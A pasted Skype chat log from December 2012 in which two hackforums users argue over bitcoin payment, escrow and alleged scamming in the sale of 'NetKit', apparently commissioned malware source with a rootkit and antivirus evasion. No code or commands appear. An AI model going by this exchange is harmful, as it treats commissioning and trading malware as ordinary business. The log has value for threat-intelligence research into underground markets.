  2514. [12/20/2012 2:11:00 AM] Shelly Bongo: and the features that ARE in - have bugs all the time
  2515. [12/20/2012 2:11:03 AM] Shelly Bongo: it's clearly untested
  2516. [12/20/2012 2:11:20 AM] Shelly Bongo: and using generic routines that make it easily detectable by AVs, although it's supposedly "custom coded"
  2517. [12/20/2012 2:11:37 AM] ' Tweety HF;: your not understanding the term of generic
  2518. [12/20/2012 2:11:58 AM] Shelly Bongo: i lost a job because of you.
  2519. [12/20/2012 2:12:13 AM] Shelly Bongo: anyway, 100 or nothing
  2520. [12/20/2012 2:12:15 AM] Shelly Bongo: good luck.
  2521. [12/20/2012 2:12:43 AM] ' Tweety HF;: $150 and its all yours.
  2522. [12/20/2012 2:13:09 AM] Shelly Bongo: i have serious trust issues when it comes to you, if i send you 150$ - i don't believe i'll get the source.
  2523. [12/20/2012 2:13:36 AM] ' Tweety HF;: i dont need the source
  2524. [12/20/2012 2:13:59 AM] Shelly Bongo: i don't care if you need it or not - you're unreliable
  2525. [12/20/2012 2:14:05 AM] Shelly Bongo: i won't send you 150$
  2526. [12/20/2012 2:14:11 AM] Shelly Bongo: with the hopes of getting the source
  2527. [12/20/2012 2:14:26 AM] Shelly Bongo: 50%/50%
  2528. [12/20/2012 2:14:37 AM] Shelly Bongo: i send half, deliver the source, i send the other half
  2529. [12/20/2012 2:15:12 AM] Shelly Bongo: decide how you want to proceed, i'm going in 5min
  2530. [12/20/2012 2:15:17 AM] Shelly Bongo: we can speak again tomorrow.
  2531. [12/20/2012 2:15:22 AM] ' Tweety HF;: dude, send it all.
  2532. [12/20/2012 2:15:23 AM] ' Tweety HF;: and you get the source.
  2533. [12/20/2012 2:15:29 AM] Shelly Bongo: not going to happen.
  2534. [12/20/2012 2:15:33 AM] ' Tweety HF;: i can easily sell this useless source for more than $250
  2535. [12/20/2012 2:15:42 AM] ' Tweety HF;: it has a darkfiresc rootkit
  2536. [12/20/2012 2:15:48 AM] Shelly Bongo: go ahead, anyone who buys it is a sucker.
  2537. [12/20/2012 2:16:11 AM] ' Tweety HF;: you have no choice but to trust me
  2538. [12/20/2012 2:16:17 AM] ' Tweety HF;: i dont need it
  2539. [12/20/2012 2:16:19 AM] ' Tweety HF;: you do
  2540. [12/20/2012 2:16:28 AM] Shelly Bongo: i have a choice - i have other contractors.
  2541. [12/20/2012 2:16:47 AM] Shelly Bongo: i'm not paying up front - i agree to bump to 150, but not all of it up front.
  2542. [12/20/2012 2:16:52 AM] ' Tweety HF;: fine
  2543. [12/20/2012 2:16:54 AM] Shelly Bongo: i already paid up front.
  2544. [12/20/2012 2:17:02 AM] ' Tweety HF;: hold on
  2545. [12/20/2012 2:17:04 AM] ' Tweety HF;: we can use a staff member
  2546. [12/20/2012 2:17:06 AM] ' Tweety HF;: as MM?
  2547. [12/20/2012 2:17:06 AM] ' Tweety HF;: deal/
  2548. [12/20/2012 2:17:17 AM] Shelly Bongo: what staff member
  2549. [12/20/2012 2:17:22 AM] Shelly Bongo: and what's MM?
  2550. [12/20/2012 2:17:28 AM] ' Tweety HF;: Staff member on HF
  2551. [12/20/2012 2:17:34 AM] ' Tweety HF;: i done over $600 in deals with him
  2552. [12/20/2012 2:17:37 AM] ' Tweety HF;: and MM = Middle Man
  2553. [12/20/2012 2:17:45 AM] Shelly Bongo: ok
  2554. [12/20/2012 2:18:00 AM] Shelly Bongo: but i'm not paying your friends up front either.
  2555. [12/20/2012 2:18:12 AM] ' Tweety HF;: what friends?
  2556. [12/20/2012 2:18:30 AM] Shelly Bongo: your forum friends, this staff member "middle man"
  2557. [12/20/2012 2:18:45 AM] ' Tweety HF;: this staff member is the most legit guy you will ever know
  2558. [12/20/2012 2:18:52 AM] ' Tweety HF;: http://www.xch4ng3.com/
  2559. [12/20/2012 2:19:08 AM] Shelly Bongo: yes but you are not.
  2560. [12/20/2012 2:19:14 AM] Shelly Bongo: you can supply code that has been ripped apart
  2561. [12/20/2012 2:19:19 AM] Shelly Bongo: you can take out the rootkit from this
  2562. [12/20/2012 2:19:20 AM] Shelly Bongo: etc.
  2563. [12/20/2012 2:19:23 AM] Shelly Bongo: don't trust you
  2564. [12/20/2012 2:19:26 AM] Shelly Bongo: you fucked up with timing
  2565. [12/20/2012 2:19:29 AM] Shelly Bongo: you fucked up with features
  2566. [12/20/2012 2:19:29 AM] ' Tweety HF;: no no
  2567. [12/20/2012 2:19:34 AM] ' Tweety HF;: i been waiting for you 2 days
  2568. [12/20/2012 2:19:38 AM] ' Tweety HF;: you wasn't online on my time zone
  2569. [12/20/2012 2:19:43 AM] Shelly Bongo: i've been waiting for you for longer than that.
  2570. [12/20/2012 2:20:07 AM] Shelly Bongo: you know you were dragging me along, with "your breakup" or whatever other excuse i don't care about
  2571. [12/20/2012 2:20:11 AM] Shelly Bongo: we had a deadline you missed
  2572. [12/20/2012 2:20:16 AM] Shelly Bongo: cost me a job
  2573. [12/20/2012 2:20:17 AM] ' Tweety HF;: no.
  2574. [12/20/2012 2:20:19 AM] ' Tweety HF;: i delivered.
  2575. [12/20/2012 2:20:25 AM] ' Tweety HF;: you wasn't online on my time
  2576. [12/20/2012 2:20:27 AM] Shelly Bongo: i have to go
  2577. [12/20/2012 2:20:29 AM] ' Tweety HF;: you know i have work and college
  2578. [12/20/2012 2:20:43 AM] Shelly Bongo: if you want to do the $150 50%/50% deal now we can
  2579. [12/20/2012 2:20:44 AM] Shelly Bongo: if not speak tomorrow
  2580. [12/20/2012 2:20:53 AM] Shelly Bongo: i'm not going to pay up front again, already did that
  2581. [12/20/2012 2:20:57 AM] Shelly Bongo: now it's your turn
  2582. [12/20/2012 2:21:10 AM] ' Tweety HF;: fine, il send you half of the source
  2583. [12/20/2012 2:21:12 AM] ' Tweety HF;: if you send half now
  2584. [12/20/2012 2:21:16 AM] ' Tweety HF;: and vice versa
  2585. [12/20/2012 2:21:17 AM] Shelly Bongo: no
  2586. [12/20/2012 2:21:22 AM] Shelly Bongo: i already SENT you money
  2587. [12/20/2012 2:21:24 AM] Shelly Bongo: you sent me NOTHING
  2588. [12/20/2012 2:21:36 AM] ' Tweety HF;: fine
  2589. [12/20/2012 2:21:39 AM] ' Tweety HF;: we can play your game
  2590. [12/20/2012 2:21:44 AM] Shelly Bongo: i'm not playing a game
  2591. [12/20/2012 2:21:49 AM] Shelly Bongo: i thought i was doing business
  2592. [12/20/2012 2:22:01 AM] Shelly Bongo: but i guess that's not something that somebody your age can do responsively.
  2593. [12/20/2012 2:22:21 AM] ' Tweety HF;: we can go half n half
  2594. [12/20/2012 2:22:22 AM] ' Tweety HF;: now
  2595. [12/20/2012 2:22:40 AM] Shelly Bongo: i send you 75$, you give me source, i check it and compile to see it works
  2596. [12/20/2012 2:22:44 AM] Shelly Bongo: and then send you $75 more
  2597. [12/20/2012 2:22:52 AM] Shelly Bongo: if you want we can do it right now
  2598. [12/20/2012 2:23:00 AM] ' Tweety HF;: Alright
  2599. [12/20/2012 2:23:19 AM] Shelly Bongo: give me bitcoin address
  2600. [12/20/2012 2:23:45 AM] ' Tweety HF;: 1 sec
  2601. [12/20/2012 2:25:28 AM] Shelly Bongo: just download the bitcoin client yourself
  2602. [12/20/2012 2:25:37 AM] Shelly Bongo: you can transfer it to your exchangers later
  2603. [12/20/2012 2:25:47 AM] Shelly Bongo: the transfer is free in bitcoin.
  2604. [12/20/2012 2:25:56 AM] ' Tweety HF;: oh
  2605. [12/20/2012 2:25:58 AM] ' Tweety HF;: alright
  2606. [12/20/2012 2:27:36 AM] ' Tweety HF;: 18VNmrqi7gd5hfteYQb3Cf2sgnzvnT4qfh
  2607. [12/20/2012 2:29:18 AM] Shelly Bongo: ok
  2608. [12/20/2012 2:29:21 AM] Shelly Bongo: 5.59297 BTC
  2609. [12/20/2012 2:29:34 AM] Shelly Bongo: (mtgox.com weighted USD-BTC average price)
  2610. [12/20/2012 2:29:47 AM] ' Tweety HF;: sec checking
  2611. [12/20/2012 2:30:23 AM] Shelly Bongo: sent.
  2612. [12/20/2012 2:30:35 AM] Shelly Bongo: it takes it a while to get confirmed by the BT network
  2613. [12/20/2012 2:30:38 AM] ' Tweety HF;: so as soon as i send source, il get the other half?
  2614. [12/20/2012 2:30:42 AM] Shelly Bongo: yes
  2615. [12/20/2012 2:33:07 AM] Shelly Bongo: well?
  2616. [12/20/2012 2:33:38 AM] ' Tweety HF;: syncing
  2617. [12/20/2012 2:33:44 AM] ' Tweety HF;: http://puu.sh/1CV1m
  2618. [12/20/2012 2:34:12 AM] Shelly Bongo: it can take 8+ hours to sync for that long... BTC clients are ment to be open all the time - if they are outdated, it takes a long time to sync.
  2619. [12/20/2012 2:35:22 AM] ' Tweety HF;: its not oudated.
  2620. [12/20/2012 2:35:29 AM] ' Tweety HF;: give it a few mins
  2621. [12/20/2012 2:35:43 AM] ' Tweety HF;: we can continue tomorrow if it takes too long
  2622. [12/20/2012 2:35:49 AM] ' Tweety HF;: il be waiting, same time
  2623. [12/20/2012 2:36:01 AM] Shelly Bongo: how likely of you to say that after i sent you funds.
  2624. [12/20/2012 2:36:10 AM] Shelly Bongo: just receive it and lets complete it now
  2625. [12/20/2012 2:36:14 AM] Shelly Bongo: i have waited enough
  2626. [12/20/2012 2:36:20 AM] ' Tweety HF;: i dunno if i recieved yet.
  2627. [12/20/2012 2:39:42 AM] Shelly Bongo: did sync finished yet?
  2628. [12/20/2012 2:41:47 AM] Shelly Bongo: okay, i need to leave - hopefully you will see the BTC got transferred soon - and then, please send the full netkit source to my skype
  2629. [12/20/2012 2:41:55 AM] Shelly Bongo: i'll click 'save' on the file transfer tomorrow
  2630. [12/20/2012 2:42:01 AM] Shelly Bongo: have to leave
  2631. [12/20/2012 2:42:38 AM] ' Tweety HF;: ok
  2632. [12/20/2012 2:06:14 PM] Shelly Bongo: hello?
  2633. [12/20/2012 2:06:35 PM] Shelly Bongo: my transaction has already been confirmed by the BT network
  2634. [12/20/2012 2:06:43 PM] Shelly Bongo: source code?
  2635. [12/20/2012 3:13:15 PM] Shelly Bongo: ran away?
  2636. [12/20/2012 3:14:55 PM] Shelly Bongo: if you screw me over again, i'm posting all about you in the forums
  2637. [12/20/2012 3:15:11 PM] Shelly Bongo: you have till end of the day to send the source
  2638. [12/20/2012 4:48:55 PM] Shelly Bongo: i thought about it and decided it's not right to send you only $150, i'm a person of my word and we did agree to 350$ - so i will pay an extra 200, not 150.  meaning the next transfer will have 125 instead of 75.
  2639.  
  2640. if you fail to deliver today, i will report you.
  2641. [12/20/2012 5:06:34 PM] ' Tweety HF;: my friends wallet is still syncing
  2642. [12/20/2012 5:06:38 PM] ' Tweety HF;: lol
  2643. [12/20/2012 5:06:45 PM] ' Tweety HF;: it should be done soon
  2644. [12/20/2012 5:10:38 PM] Shelly Bongo: http://blockchain.info/tx-index/37854118/1526ac7351e776d71159aede67eceadbbbe57423af6519705849de4734c0fd06
  2645. [12/20/2012 5:10:49 PM] Shelly Bongo: http://blockchain.info/address/18VNmrqi7gd5hfteYQb3Cf2sgnzvnT4qfh
  2646. [12/20/2012 5:10:58 PM] Shelly Bongo: the transaction was done, over 60 confirmations
  2647. [12/20/2012 5:10:59 PM] Shelly Bongo: send the source.
  2648. [12/20/2012 5:11:50 PM] ' Tweety HF;: Hold on
  2649. [12/20/2012 5:24:18 PM] Shelly Bongo: well???
  2650. [12/20/2012 5:25:23 PM] ' Tweety HF;: my friend has a crap pc so your going to need to wait till his wallet sync
  2651. [12/20/2012 5:25:39 PM] ' Tweety HF;: trust me, its making me mad as well. I dislike waiting to recieve money as much as you dislike the wait time for the source
  2652. [12/20/2012 5:45:40 PM] Shelly Bongo: i told what you happens, you have till midnight.
  2653. [12/20/2012 5:45:50 PM] Shelly Bongo: your friends bitcoin troubles is of no concern to me
  2654. [12/20/2012 7:38:15 PM] Shelly Bongo: besides, you can clearly see in the links i sent that the 5.x BTC *were* indeed transfered to the address of the BTC wallet you provided me
  2655. [12/20/2012 7:39:11 PM] ' Tweety HF;: i dunno how BTC work
  2656. [12/20/2012 7:41:23 PM] Shelly Bongo: don't care, send the source.
  2657. [12/20/2012 7:41:31 PM] Shelly Bongo: you got the money.
  2658. [12/20/2012 7:43:04 PM] ' Tweety HF;: Well you need to wait, I believe you said at the end of today, midnight.
  2659. [12/20/2012 7:43:23 PM] Shelly Bongo: you were supposed to send it immediately upon the receipt of the money.
  2660. [12/20/2012 7:43:39 PM] Shelly Bongo: you have been delaying ever since with "my friend has an issue, synchronizing takes time"
  2661. [12/20/2012 7:43:50 PM] Shelly Bongo: i'm sure in this time you'll be handicapping the source.
  2662. [12/20/2012 7:44:02 PM] Shelly Bongo: i'll check it, i remember what was in, i took screenshots during our sessions.
  2663. [12/20/2012 7:44:08 PM] Shelly Bongo: it better damn be the same.
  2664. [12/20/2012 9:52:19 PM] Shelly Bongo: so where would you like me to start
  2665. [12/20/2012 9:52:21 PM] Shelly Bongo: leakforums
  2666. [12/20/2012 9:52:23 PM] Shelly Bongo: hackforums
  2667. [12/20/2012 9:52:40 PM] Shelly Bongo: it's going to include your friend mephobia too, who recommended you
  2668. [12/20/2012 9:52:48 PM] Shelly Bongo: you thieving bastards will get known.
  2669. [12/20/2012 9:57:38 PM] ' Tweety HF;: I'll PM you in 2.6 hours.
  2670. [12/20/2012 11:02:46 PM] Shelly Bongo: okay, you are not getting an extra 125, but 75.
  2671. [12/20/2012 11:03:03 PM] Shelly Bongo: if you don't deliver, which will not surprise me, i'm going public
  2672. [12/20/2012 11:03:46 PM] ' Tweety HF;: And whys that?
  2673. [12/20/2012 11:03:52 PM] ' Tweety HF;: [Thursday, December 20, 2012 7:42 PM] ' Tweety HF;:
  2674.  
  2675. <<< Well you need to wait, I believe you said at the end of today, midnight.
  2676. [12/20/2012 11:04:00 PM] ' Tweety HF;: [Thursday, December 20, 2012 5:45 PM] Shelly Bongo:
  2677.  
  2678. <<< i told what you happens, you have till midnight.
  2679. [12/20/2012 11:13:30 PM] Shelly Bongo: because it's past midnight.
  2680. [12/20/2012 11:13:46 PM] ' Tweety HF;: 9:15 PM here.
  2681. [12/20/2012 11:13:59 PM] Shelly Bongo: i work by my own timezone not yours.
  2682. [12/20/2012 11:14:14 PM] Shelly Bongo: there is absolutely no reason for you to delay me like this
  2683. [12/20/2012 11:14:18 PM] ' Tweety HF;: You should have been a little more specific then.
  2684. [12/20/2012 11:14:24 PM] Shelly Bongo: it has been over 24 hours(!!!) since i send those 75 dollars man
  2685. [12/20/2012 11:14:27 PM] Shelly Bongo: what the hell are you doing?
  2686. [12/20/2012 11:14:46 PM] ' Tweety HF;: Just getting some work done
  2687. [12/20/2012 11:15:04 PM] Shelly Bongo: i'm preparing the post as we speak
  2688. [12/20/2012 11:15:13 PM] Shelly Bongo: you have exactly 10 mins to transfer the code, no more waiting
  2689. [12/20/2012 11:16:36 PM] ' Tweety HF;: http://www.youtube.com/watch?v=IHnGMV8yOEQ
  2690. [12/20/2012 11:25:11 PM] Shelly Bongo: http://www.hackforums.net/forumdisplay.php?fid=111
  2691. [12/20/2012 11:25:16 PM] Shelly Bongo: see yourself starring here in a few mins.
  2692. [12/20/2012 11:26:14 PM] ' Tweety HF;: sure.
  2693. [12/20/2012 11:27:02 PM] Shelly Bongo: so you're not providing the source?
  2694. [12/20/2012 11:27:19 PM] Shelly Bongo: you fucked me over by $225?
  2695. [12/20/2012 11:27:33 PM] ' Tweety HF;: [Thursday, December 20, 2012 11:03 PM] ' Tweety HF;:
  2696.  
  2697. <<< Well you need to wait, I believe you said at the end of today, midnight.
  2698. [12/20/2012 11:27:51 PM] Shelly Bongo: as you wish.
  2699. [12:04:52 AM] ' Tweety HF;: his GPU sucks so bad its like 2 block p/s lol
  2700. [12:05:03 AM] ' Tweety HF;: il just send you the source
  2701. [12:05:15 AM] ' Tweety HF;: and you can send the rest to the new address
  2702. [12:05:38 AM] Shelly Bongo: send the source and quit making excuses
  2703. [12:05:48 AM] ' Tweety HF;: 17WDEQTbsdqcbXCrErTmnMxtPX4TH4RYY6
  2704. [12:05:51 AM] ' Tweety HF;: 125 over their
  2705. [12:07:17 AM] Shelly Bongo: i'm not sending any money before you deliver the product you asshole - we had an agreement where you were supposed to deliver the source after i send you 150$, i paid and you didn't - then we agreed i add 75$ and you deliver - again i paid and you didn't send anything - why the hell would i send you MORE? send me the source already as agreed you scammer.
  2706. [12:07:38 AM] ' Tweety HF;: im not scamming anything.
  2707. [12:07:49 AM] ' Tweety HF;: so your saying you wont pay on the rest of the 125 you just said you will?
  2708. [12:08:06 AM] Shelly Bongo: i will pay AFTER YOU SEND THE SOURCE AND I SEE IT'S REALLY THE PRODUCT
  2709. [12:08:25 AM] Shelly Bongo: i will not pay that *before* you send the source, i lost enough money as is and so far got nothing.
  2710. [12:08:41 AM] ' Tweety HF;: sure
  2711. [12:08:49 AM] ' Tweety HF;: Will do this my way then
  2712. [12:08:56 AM] Shelly Bongo: what way
  2713. [12:08:59 AM] ' Tweety HF;: nobody will lose
  2714. [12:09:07 AM] ' Tweety HF;: we will both be happy
  2715. [12:09:35 AM] ' Tweety HF;:
  2716.  
  2717. https://secure.join.me/487-166-070
  2718. [12:09:38 AM] ' Tweety HF;: join
  2719. [12:10:40 AM] Shelly Bongo: and what will happen there?
  2720. [12:10:57 AM] ' Tweety HF;: il show you me archiving the working netkit
  2721. [12:11:02 AM] ' Tweety HF;: and il send it
  2722. [12:11:07 AM] ' Tweety HF;: it will have a password
  2723. [12:11:11 AM] ' Tweety HF;: so you will have netkit
  2724. [12:11:14 AM] ' Tweety HF;: working
  2725. [12:11:21 AM] ' Tweety HF;: and then il give ya the pass once the pay goes through
  2726. [12:13:04 AM] Shelly Bongo: you won't give me the password
  2727. [12:13:08 AM] Shelly Bongo: send the source as agreed.
  2728. [12:13:11 AM] Shelly Bongo: we had an agreement
  2729. [12:13:14 AM] ' Tweety HF;: yes i will
  2730. [12:13:17 AM] Shelly Bongo: you keep changing your mind about the agreement
  2731. [12:13:25 AM] Shelly Bongo: you were supposed to send me the source after the 75$
  2732. [12:13:26 AM] ' Tweety HF;: because the situation changes
  2733. [12:13:47 AM] Shelly Bongo: WHAT changed in the situation? we agreed that after 75$ you send me the source and i test that it's okay
  2734. [12:13:55 AM] Shelly Bongo: i sent you the money and you aren't sending me the source
  2735. [12:13:58 AM] Shelly Bongo: but demand more money
  2736. [12:14:00 AM] Shelly Bongo: why?
  2737. [12:14:11 AM] ' Tweety HF;: because i have reason to believe its your way out
  2738. [12:14:18 AM] ' Tweety HF;: im leaving in 15 minutes
  2739. [12:14:25 AM] ' Tweety HF;: so quick plz
  2740. [12:15:20 AM] Shelly Bongo: i'm not sending you any more money, you have enough of it.
  2741. [12:15:23 AM] Shelly Bongo: i'm reporting you.
  2742. [12:15:48 AM] ' Tweety HF;: you can report me all you like
  2743. [12:15:52 AM] Shelly Bongo: you're not only a lousy coder but a lowlife as well.
  2744. [12:15:59 AM] ' Tweety HF;: it wont get either of us anywhere
  2745. [12:16:12 AM] ' Tweety HF;: im trying to make progress and get this over and done with
  2746. [12:16:45 AM] Shelly Bongo: as i said, i'm reporting you, that's it
  2747. [12:16:53 AM] Shelly Bongo: if you wish this to not be done, send the source.
  2748. [12:16:56 AM] Shelly Bongo: no passwords
  2749. [12:16:59 AM] ' Tweety HF;: no
  2750. [12:17:00 AM] ' Tweety HF;: password
  2751. [12:17:01 AM] Shelly Bongo: ok
  2752. [12:17:02 AM] ' Tweety HF;: and il send
  2753. [12:17:02 AM] ' Tweety HF;: sure
  2754. [12:17:06 AM] Shelly Bongo: then it's not going to happen.
  2755. [12:17:23 AM] *** ' Tweety HF; sent NetKit.rar ***
  2756. [12:17:26 AM] ' Tweety HF;: has a password
  2757. [12:17:38 AM] ' Tweety HF;: decline = theirs no more business done
  2758. [12:17:42 AM] ' Tweety HF;: accept = we can proceed
  2759. [12:21:10 AM] ' Tweety HF;: Well im leaving soon
  2760. [12:21:48 AM] Shelly Bongo: go ahead and leave, i have no use for a password protected rar file, the only thing you can send to complete our deal is the full source code ready for my testing and analysis.
  2761. [12:22:10 AM] ' Tweety HF;: test it out all you want
  2762. [12:22:15 AM] ' Tweety HF;: you got everything you need in that file
  2763. [12:22:19 AM] Shelly Bongo: i can't if it's password protected.
  2764. [12:22:32 AM] ' Tweety HF;: il hand the password over once you pay the rest
  2765. [12:22:36 AM] ' Tweety HF;: everybody wins?
  2766. [12:22:53 AM] Shelly Bongo: [12:13 AM] Shelly Bongo:
  2767.  
  2768. <<< you won't give me the password
  2769. send the source as agreed.
  2770. we had an agreement
  2771. [12:23:37 AM] ' Tweety HF;: you refuse to use a method where both parties are kept happy
  2772. [12:23:45 AM] ' Tweety HF;: sketchy.
  2773. [12:24:37 AM] Shelly Bongo: one party isn't kept happy - that'd be me
  2774. [12:25:07 AM] Shelly Bongo: you keep milking money without supplying anything, you have 225$, what do i have? nothing
  2775. [12:25:14 AM] Shelly Bongo: i'm not sending you another dime
  2776. [12:25:19 AM] ' Tweety HF;: you gotthe whole project their
  2777. [12:25:25 AM] Shelly Bongo: unless you send the source and i validate it
  2778. [12:25:41 AM] ' Tweety HF;: thats why i gave you joinme link
  2779. [12:25:42 AM] Shelly Bongo: the rar is useless unless i have the password
  2780. [12:25:50 AM] ' Tweety HF;: you could watch me put netkit in the rar
  2781. [12:26:05 AM] Shelly Bongo: joinme isn't sufficient for actual testing and validation and source code review, it's just to see basic functionality
  2782. [12:26:31 AM] Shelly Bongo: we said i'll test it and pay the rest, and you're trying to avoid it, i'm sure you removed parts from the source
  2783. [12:26:43 AM] Shelly Bongo: and want to leave me with a hurt wallet and no product
  2784. [12:26:48 AM] ' Tweety HF;: i didnt remove anything
  2785. [12:27:09 AM] Shelly Bongo: well, the fact that you didn't keep your word for several times now indicates otherwise.
  2786. [12:27:31 AM] Shelly Bongo: anyway, enough talk, i told you - either send the source, no password, and after i see it's what we discussed, you get paid
  2787. [12:27:51 AM] Shelly Bongo: or we part ways, and i'll find a way to get back at you for being such a scammer.
  2788. [12:28:22 AM] ' Tweety HF;: im not scamming ya
  2789. [12:30:07 AM] Shelly Bongo: fact: we agreed you send the source after $150, you didn't because you were afraid i would run off with it.  we agreed i'd add another 75$ and *after that* you'll send the source - now you're not doing it again.
  2790. [12:30:16 AM] Shelly Bongo: fact: i have nothing, you have $225 usd of my money
  2791. [12:30:21 AM] Shelly Bongo: that, is called a scam.
  2792. [12:30:35 AM] ' Tweety HF;: Fact: pay it off, you get everything
  2793. [12:30:51 AM] Shelly Bongo: that's not a fact you idiot, that's an offer.
  2794. [12:30:54 AM] Shelly Bongo: and the offer isn't accepted.
  2795. [12:37:56 AM] ' Tweety HF;: Look, I have your damn source. I don't care if I send it to you or if I dont. I already been paid enough to compensate for my time. You either pay it off and get your source, or you just fuck off and I don't need to bother myself with that anymore. I walk away with the well deserved cash for my time. Open your scam report, I don't give a damn. You paid for it, you don't want it. Not my problem. I'm asking you for the last time.
  2796.  
  2797. Pay up, or fuck off. I don't need this shit anymore. I have other professional customers to attend to as well as my new service. Time is money, you wasted way too much. The next reply from you should be in MY favour. If not, im blocking you and out you go outa my life. Open your scam report, I have enough proof of your man period swinging your terms being changed. If it's not in my favour then peace out.
  2798.  
  2799. Oh and by the way, Stack up the cheese, ham with the turkey, gimme that capri-sun, bitch im thirsty. That's what all the Lunchablez cool kids are saying.
  2800. [12:51:31 AM] ' Tweety HF;: Should I take this as a 'fuck you'?
  2801. [12:53:17 AM] ' Tweety HF;: Alright. I'll take it as you don't want it.
  2802. [12:53:22 AM] ' Tweety HF;: Peace out.
  2803. [12:53:45 AM] Shelly Bongo: i want is as per our agreement, i don't want to be extorted.
RAW Paste Data
Top